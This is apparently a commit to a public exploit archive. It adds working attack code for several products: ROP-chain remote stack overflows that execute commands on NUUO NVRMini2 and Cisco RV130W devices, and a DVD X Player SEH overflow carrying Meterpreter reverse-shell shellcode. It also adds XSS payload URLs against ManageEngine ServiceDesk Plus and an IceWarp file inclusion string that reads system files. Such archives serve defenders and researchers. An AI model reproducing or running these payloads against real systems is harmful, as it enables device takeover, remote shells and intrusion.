DB: 2019-06-05

8 changes to exploits/shellcodes DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow Cisco RV130W 1.0.3.44 - Remote Stack Overflow IceWarp 10.4.4 - Local File Inclusion Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting
2019-06-05 05:01:56 +00:00 · 2019-06-05 05:01:56 +00:00 · 76be51b7d6
commit 76be51b7d6
parent 43e70e67d0
9 changed files with 296 additions and 0 deletions
--- a/exploits/hardware/remote/46960.py
+++ b/exploits/hardware/remote/46960.py
@ -0,0 +1,89 @@
+#!/usr/bin/python
+# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
+# Google Dork: n/a
+# Date: Advisory Published: Nov 18
+# Exploit Author: @0x00string
+# Vendor Homepage: nuuo.com
+# Software Link: https://www.nuuo.com/ProductNode.php?node=2
+# Version: 3.9.1 and prior
+# Tested on: 3.9.1
+# CVE : CVE-2018-19864
+#
+#   [ leading / ]
+#   [ Padding x 335 ]
+#   [ original value at stack pointer + 158 ]
+#   [ padding x 80 ]
+#   [ address of (pop {r3,lr} ; bx lr) ]
+#   [ system() address ]
+#   [ address of (mov r0,sp ; blx r3) ]
+#   [ command to execute ]
+
+def banner():
+    print '''
+              @0x00string
+             0000000000000
+          0000000000000000000   00
+       00000000000000000000000000000
+      0000000000000000000000000000000
+    000000000             0000000000
+   00000000               0000000000
+  0000000                000000000000
+ 0000000               000000000000000
+ 000000              000000000  000000
+0000000            000000000     000000
+000000            000000000      000000
+000000          000000000        000000
+000000         00000000          000000
+000000       000000000           000000
+0000000    000000000            0000000
+ 000000   000000000             000000
+ 0000000000000000              0000000
+  0000000000000               0000000
+   00000000000              00000000
+   00000000000            000000000
+  0000000000000000000000000000000
+   00000000000000000000000000000
+     000  0000000000000000000
+             0000000000000
+https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
+'''
+
+def usage ():
+    print   ("python script.py <args>\n"
+            "   -h, --help:             Show this message\n"
+            "   -a, --rhost:            Target IP address\n"
+            "   -b, --rport:            Target Port - default 5150\n"
+            "   -c, --command:          Command to execute\n"
+            "\n"
+            "Example:\n"
+            "python script.py -a 10.10.10.10\n"
+            "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
+    exit()
+
+def main():
+    rhost = None;
+    rport = "5150";
+    command = "{/bin/touch,/tmp/hax}"
+    banner()
+    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
+    for opt, arg in options:
+        if opt in ('-h', '--help'):
+            usage()
+        elif opt in ('-a','--rhost'):
+            rhost = arg;
+        elif opt in ('-b','--rport'):
+            rport = arg;
+        elif opt in ('-c','--command'):
+            command = arg;
+    print ("Sending exploit to execute [" + command + "]\n")
+    buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
+    "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
+    "http://" + rhost + ":" + rport + "\r\n\r\n"
+    sock = socket(AF_INET, SOCK_STREAM)
+    sock.settimeout(30)
+    sock.connect((target_ip,int(target_port)))
+    sock.send(buf)
+    print ("done\n")
+
+if __name__ == "__main__":
+    main()
--- a/exploits/hardware/remote/46961.py
+++ b/exploits/hardware/remote/46961.py
@ -0,0 +1,68 @@
+#!/usr/bin/python
+# Exploit Title: Cisco RV130W Remote Stack Overflow
+# Google Dork: n/a
+# Date: Advisory Published: Feb 2019
+# Exploit Author: @0x00string
+# Vendor Homepage: cisco.com
+# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
+# Version: 1.0.3.44 and prior
+# Tested on: 1.0.3.44
+# CVE : CVE-2019-1663
+#
+# 0x357fc000 - libc base addr
+# 0x35849144 - system() addr
+# 
+# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
+# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; 
+# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
+# 
+#   gadget 1    system()   junk   gadget 2   junk  junk  junk  junk  junk   gadget 3    text
+# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
+#
+# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
+
+#!/usr/bin/python
+import requests
+
+def banner():
+    print '''
+              @0x00string
+             0000000000000
+          0000000000000000000   00
+       00000000000000000000000000000
+      0000000000000000000000000000000
+    000000000             0000000000
+   00000000               0000000000
+  0000000                000000000000
+ 0000000               000000000000000
+ 000000              000000000  000000
+0000000            000000000     000000
+000000            000000000      000000
+000000          000000000        000000
+000000         00000000          000000
+000000       000000000           000000
+0000000    000000000            0000000
+ 000000   000000000             000000
+ 0000000000000000              0000000
+  0000000000000               0000000
+   00000000000              00000000
+   00000000000            000000000
+  0000000000000000000000000000000
+   00000000000000000000000000000
+     000  0000000000000000000
+             0000000000000
+https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
+'''
+
+def main():
+    banner()
+    command = "ping 192.168.1.100\x00"
+    print ("Sending exploit to execute [" + command + "]\n")
+    rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
+    payload = ("Z" * 446) + rop + command
+    url = "https://192.168.1.100:443/login.cgi"
+    data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
+    r = requests.post(url, payload=data)
+
+if __name__ == "__main__":
+    main()
--- a/exploits/java/webapps/46963.txt
+++ b/exploits/java/webapps/46963.txt
@ -0,0 +1,14 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12538
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter
+
+
+Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=
+
+PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view
--- a/exploits/java/webapps/46964.txt
+++ b/exploits/java/webapps/46964.txt
@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do 
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12541
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.
+
+
+Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions
+
+
+PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view
--- a/exploits/java/webapps/46965.txt
+++ b/exploits/java/webapps/46965.txt
@ -0,0 +1,14 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12542
+
+
+An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.
+
+
+Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site
+
+PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
--- a/exploits/java/webapps/46966.txt
+++ b/exploits/java/webapps/46966.txt
@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12543
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.
+
+
+Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl
+
+
+PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
--- a/exploits/php/webapps/46959.txt
+++ b/exploits/php/webapps/46959.txt
@ -0,0 +1,15 @@
+# Exploit Title: IceWarp <=10.4.4 local file include
+# Date: 02/06/2019
+# Exploit Author: JameelNabbo
+# Website: uitsec.com
+# Vendor Homepage: http://www.icewarp.com
+# Software Link: https://www.icewarp.com/downloads/trial/
+# Version: 10.4.4
+# Tested on: Windows 10
+# CVE: CVE-2019-12593
+POC:
+
+http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
+
+Example:
+http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
--- a/exploits/windows/local/46962.py
+++ b/exploits/windows/local/46962.py
@ -0,0 +1,58 @@
+# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
+# Date: 6-3-2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
+# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
+# Version: 5.5 Pro
+# Tested on: Windows 7
+# CVE : N/A
+
+#!/usr/bin/python
+###########Create Shellcode with MSFVenom###############################################################################################
+##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
+########################################################################################################################################
+file_name = "payloadofficial.plf"
+
+#######################Copy and Paste Shellcode Here!!###########################
+buf =  ""
+buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
+buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
+buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
+buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
+buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
+buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
+buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
+buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
+buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
+buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
+buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
+buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
+buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
+buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
+buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
+buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
+buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
+buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
+buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
+buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
+buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
+buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
+buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
+buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
+buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
+buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
+buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
+buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
+buf += "\x49\x21\x39\x12"
+#################################################################################
+
+#No Operations#
+nops = "\x90"*20
+shellcode = nops + buf
+
+####Where all the magic happens! :)#####################################################################
+buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode))
+###################################################################################################
+plf_file = open(file_name,"w")
+plf_file.write(buffer)
+plf_file.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10537,6 +10537,7 @@ id,file,description,date,author,type,platform,port
 46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
 46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows,
 46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows,
+46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17477,6 +17478,8 @@ id,file,description,date,author,type,platform,port
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
+46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware,
+46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41367,3 +41370,8 @@ id,file,description,date,author,type,platform,port
 46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,
+46959,exploits/php/webapps/46959.txt,"IceWarp 10.4.4 - Local File Inclusion",2019-06-04,JameelNabbo,webapps,php,
+46963,exploits/java/webapps/46963.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,